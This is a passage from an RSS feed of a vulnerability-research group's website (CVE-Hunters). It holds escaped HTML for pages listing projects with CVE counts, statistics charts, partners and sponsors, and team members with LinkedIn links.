          &amp;lt;img src=&amp;#34;/about/NovoSGA.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;NovoSGA&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/librenms/librenms&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/LibreNMS.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;LibreNMS&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 1&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 2&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 3&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/projeto-siga/siga&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/siga.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;SIGA&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn-icons-png.flaticon.com/512/226/226777.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 1&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Search</title>
        <link>https://www.cvehunters.com/search/</link>
        <guid>https://www.cvehunters.com/search/</guid>
        <description></description><content:encoded></content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Stats</title>
        <link>https://www.cvehunters.com/stats/</link>
        <guid>https://www.cvehunters.com/stats/</guid>
        <description>&amp;lt;p&amp;gt;All statistics of CVEs registered by CVE-Hunters&amp;amp;rsquo;s Team:&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;total-cves-registered&amp;#34;&amp;gt;Total CVEs Registered
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/totalCVEsRegistred.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;top-finders&amp;#34;&amp;gt;Top Finders
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/topFinderss.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;vulnerability-type&amp;#34;&amp;gt;Vulnerability Type
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/vulnerabilityType.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;severity&amp;#34;&amp;gt;Severity
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/severity.png&amp;#34; width=100% height=100&amp;gt;
&amp;lt;h3 id=&amp;#34;repository-stars-history&amp;#34;&amp;gt;Repository Stars History
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&amp;amp;type=Date&amp;#34; width=100% height=100&amp;gt;</description><content:encoded>&amp;lt;p&amp;gt;All statistics of CVEs registered by CVE-Hunters&amp;amp;rsquo;s Team:&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;total-cves-registered&amp;#34;&amp;gt;Total CVEs Registered
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/totalCVEsRegistred.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;top-finders&amp;#34;&amp;gt;Top Finders
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/topFinderss.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;vulnerability-type&amp;#34;&amp;gt;Vulnerability Type
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/vulnerabilityType.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;severity&amp;#34;&amp;gt;Severity
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;/stats/severity.png&amp;#34; width=100% height=100 /&amp;gt;
&amp;lt;h3 id=&amp;#34;repository-stars-history&amp;#34;&amp;gt;Repository Stars History
&amp;lt;/h3&amp;gt;&amp;lt;img src=&amp;#34;https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&amp;amp;type=Date&amp;#34; width=100% height=100 /&amp;gt;</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Support</title>
        <link>https://www.cvehunters.com/support/</link>
        <guid>https://www.cvehunters.com/support/</guid>
        <description>&amp;lt;p&amp;gt;Learn more about our partners and sponsors below:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;partners&amp;#34;&amp;gt;Partners
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;azure.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;caido.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;hacktiba.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;Azure&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;caido&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;Hacktiba&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;vuldb.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;VulDB&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;sponsors&amp;#34;&amp;gt;Sponsors
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;instituto-um-passo-de-cada-vez.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;future.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;Instituto Um Passo&amp;lt;/br&amp;gt;de Cada Vez&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;future&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</description><content:encoded>&amp;lt;p&amp;gt;Learn more about our partners and sponsors below:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;partners&amp;#34;&amp;gt;Partners
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;azure.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;caido.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;hacktiba.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;Azure&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;caido&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;Hacktiba&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;vuldb.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;VulDB&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;sponsors&amp;#34;&amp;gt;Sponsors
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;instituto-um-passo-de-cada-vez.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;future.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;Instituto Um Passo&amp;lt;/br&amp;gt;de Cada Vez&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;future&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Team</title>
        <link>https://www.cvehunters.com/team/</link>
        <guid>https://www.cvehunters.com/team/</guid>
        <description>&amp;lt;p&amp;gt;You can find useful repositories and contributors links below:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;founder&amp;#34;&amp;gt;Founder
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/natan.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;Natan Maia&amp;lt;br&amp;gt; Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/angelo.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/diego.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/elisangela.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;Angelo&amp;lt;br&amp;gt;Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;Diego&amp;lt;br&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;Elisângela&amp;lt;br&amp;gt;Mendonça&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/isadora.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/itauan.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;Fernanda&amp;lt;br&amp;gt;Martins&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;Isadora&amp;lt;br&amp;gt;Novaes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;Itauan&amp;lt;br&amp;gt;Santos&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/karina.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcelo.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcos.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;Karina&amp;lt;br&amp;gt;Gante&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;Marcelo&amp;lt;br&amp;gt;Queiroz&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;Marcos&amp;lt;br&amp;gt;Tolosa&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/pedro.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/rafael.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/raul.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;Pedro&amp;lt;br&amp;gt;Lyrio&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;Rafael&amp;lt;br&amp;gt;Corvino&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;Raul&amp;lt;br&amp;gt;Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
